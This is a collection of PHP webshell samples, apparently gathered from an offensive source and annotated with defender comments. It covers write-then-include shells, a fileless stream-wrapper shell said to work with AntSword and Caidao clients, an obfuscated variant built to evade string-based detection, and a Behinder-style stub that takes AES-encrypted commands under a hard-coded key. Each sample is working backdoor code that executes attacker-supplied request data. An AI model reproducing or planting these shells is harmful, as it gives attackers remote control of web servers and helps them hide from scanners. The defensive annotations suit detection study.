写文件include
| <?php
// Write-then-include webshell sample, kept verbatim for analysis.
// The percent-encoded bytes are URL-decoded and then inverted with the bitwise NOT operator;
// the result is the string "file_put_contents", which is invoked as a callable, so the
// function name never appears literally in the source.
// The call writes the request-supplied POST field `a`, wrapped in PHP tags, to temp.php
// (a relative path, so it resolves against the process working directory).
// Defender notes: a new .php file written by the web-server account is visible to
// file-integrity monitoring; denying the PHP process write access to the web root blocks
// this variant. Static scanners should treat a call whose callee is a `~`-inverted string
// expression as suspicious.
(~urldecode("%99%96%93%9A%A0%8F%8A%8B%A0%9C%90%91%8B%9A%91%8B%8C"))('temp.php','<?php '.$_POST[a].' ?>');
// The file written on the previous line is executed immediately.
include('temp.php');
?>
| <?php
// Same write-then-include pattern as the sample above, using plain fopen/fwrite/fclose
// with no obfuscation of the function names.
// Defender notes: the artifact is temp.php created next to the script (relative path);
// file-integrity monitoring and a non-writable web root both apply here.
$file = fopen("temp.php","w");
// The POST field `a` is wrapped in PHP tags and written out; echo sends fwrite()'s
// return value (bytes written, or false on failure) back in the HTTP response.
echo fwrite($file,"<?php ".$_POST[a].' ?>');
fclose($file);
// Executes the request-controlled file that was just written.
include('temp.php');
?>
无文件落地include
通用,适用于蚁剑、菜刀等客户端
使用自定义协议(stream wrapper)将传入的字符串当作文件来 include,无需把文件写入磁盘
| /*
 * Fileless include sample, kept verbatim for analysis (the listing as captured has no
 * opening PHP tag). The global $user holds PHP source built from the POST field `a`;
 * a user-defined stream wrapper then serves that string to include(), so nothing is
 * written to disk.
 * Defender notes: file-integrity monitoring will not see a payload file. The static
 * trait to hunt for is stream_wrapper_register() on a user class followed by include()
 * of that custom scheme. A wrapper registered without the STREAM_IS_URL flag is treated
 * as a local stream, so allow_url_include=Off should not be relied on to stop it;
 * listing stream_wrapper_register in disable_functions is an option where the
 * application does not need it.
 */
$user="<?php ".$_POST[a].' ?>';
class VStream {
    // Source text served to the reader, and the current read offset into it.
    private $string;
    private $position;
    // Called by PHP when a var:// path is opened. The URL host part is used as the NAME
    // of a global variable (variable-variable lookup), and that variable's value becomes
    // the stream content.
    public function stream_open($path, $mode, $options, &$opened_path) {
        $url = parse_url($path);
        $id = $url["host"];
        global $$id;
        $this->string = $$id;
        $this->position = 0;
        return true;
    }
    // Returns up to $count bytes from the current offset and advances the offset by the
    // number of bytes actually returned.
    public function stream_read($count) {
        $ret = substr($this->string, $this->position, $count);
        $this->position += strlen($ret);
        return $ret;
    }
    // Empty bodies (return null); presumably present only so the methods PHP calls on a
    // wrapper during include exist - TODO confirm.
    public function stream_eof() {}
    public function stream_stat() {}
}
// Registers the class under the "var" scheme, then includes var://user, which makes
// stream_open() resolve the host "user" to the global $user defined above.
stream_wrapper_register("var", "VStream");
include("var://user");
?>
进一步去除 POST 特征,并对流量进行 Base64 编码
| <?php
// Obfuscated variant of the fileless include sample, kept verbatim for analysis.
// Defender notes: the literals "$_POST" and "base64_decode" do not appear in this file,
// so rules keyed on those strings will not match; review structural traits instead:
// a name assembled from chr()/XOR, a callee produced by strrev(), a `${...}` variable-
// variable lookup, and stream_wrapper_register() followed by include() of the custom scheme.

// Returns the string "_POST": '_' followed by chr(51^99)='P', chr(93^18)='O',
// chr(70^21)='S', chr(39^115)='T'.
function AtgI(){
    $_1='_'.chr(51^99).chr(93^18).chr(70^21).chr(39^115);
    return $_1;
}
// strrev() of the bare word yields "base64_decode", called on the POST field `a`
// (reached through the variable-variable built from AtgI()).
$params = strrev(edoced_46esab)(${AtgI()}[a]);
// The decoded request data is wrapped in PHP tags and stored in the global the wrapper reads.
$user="<?php ".$params.' ?>';
class VStream {
    // Source text served to the reader, and the current read offset into it.
    private $string;
    private $position;
    // The URL host part names a global variable; its value becomes the stream content.
    public function stream_open($path, $mode, $options, &$opened_path) {
        $url = parse_url($path);
        $id = $url["host"];
        global $$id;
        $this->string = $$id;
        $this->position = 0;
        return true;
    }
    // Returns up to $count bytes from the current offset and advances the offset.
    public function stream_read($count) {
        $ret = substr($this->string, $this->position, $count);
        $this->position += strlen($ret);
        return $ret;
    }
    // Empty bodies (return null); presumably only there so the methods exist - TODO confirm.
    public function stream_eof() {}
    public function stream_stat() {}
}
// Registers the "var" scheme and includes var://user, i.e. executes the content of $user.
stream_wrapper_register("var", "VStream");
include("var://user");
?>
behinder
| <?php
// Behinder-style server stub combined with the fileless include wrapper, kept verbatim
// for analysis.
// Defender notes: the request body is ciphertext read raw from php://input, so request
// inspection alone shows only an opaque blob; pair it with source scanning for the traits
// visible here: a hard-coded 16-character key copied into $_SESSION['k'], a raw
// php://input read, openssl_decrypt with an XOR fallback, and stream_wrapper_register()
// followed by include() of the custom scheme. The key literal below is a static
// indicator for this particular sample.

// Silences error output for the rest of the request.
@error_reporting(0);
session_start();
$key="dd42f170a6074880";
// The key is stored in the session, and the session is closed right away.
$_SESSION['k']=$key;
session_write_close();
// Raw request body, not the parsed POST fields.
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
    // Fallback without the openssl extension: base64-decode (function name split across
    // two string literals), then XOR every byte with a key byte.
    $t="base64_"."decode";
    $post=$t($post."");
    for($i=0;$i<strlen($post);$i++) {
        // `+` binds tighter than `&`, so the key index is ($i+1) & 15.
        $post[$i] = $post[$i]^$key[$i+1&15];
    }
}
else
{
    // No IV argument is passed; "AES128" is presumably OpenSSL's alias for
    // AES-128-CBC - TODO confirm.
    $post=openssl_decrypt($post, "AES128", $key);
}
// The plaintext is split on '|': the first field goes to $func, which is not used again
// in the visible code; the second field is the source that gets executed.
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
// Decrypted request data prefixed with a PHP open tag and an error-suppression operator.
$user='<?php @'.$params;
class VStream {
    // Source text served to the reader, and the current read offset into it.
    private $string;
    private $position;
    // The URL host part names a global variable; its value becomes the stream content.
    public function stream_open($path, $mode, $options, &$opened_path) {
        $url = parse_url($path);
        $id = $url["host"];
        global $$id;
        $this->string = $$id;
        $this->position = 0;
        return true;
    }
    // Returns up to $count bytes from the current offset and advances the offset.
    public function stream_read($count) {
        $ret = substr($this->string, $this->position, $count);
        $this->position += strlen($ret);
        return $ret;
    }
    // Empty bodies (return null); presumably only there so the methods exist - TODO confirm.
    public function stream_eof() {}
    public function stream_stat() {}
}
// Registers the "var" scheme and includes var://user, i.e. executes the content of $user.
stream_wrapper_register("var", "VStream");
include("var://user");
?>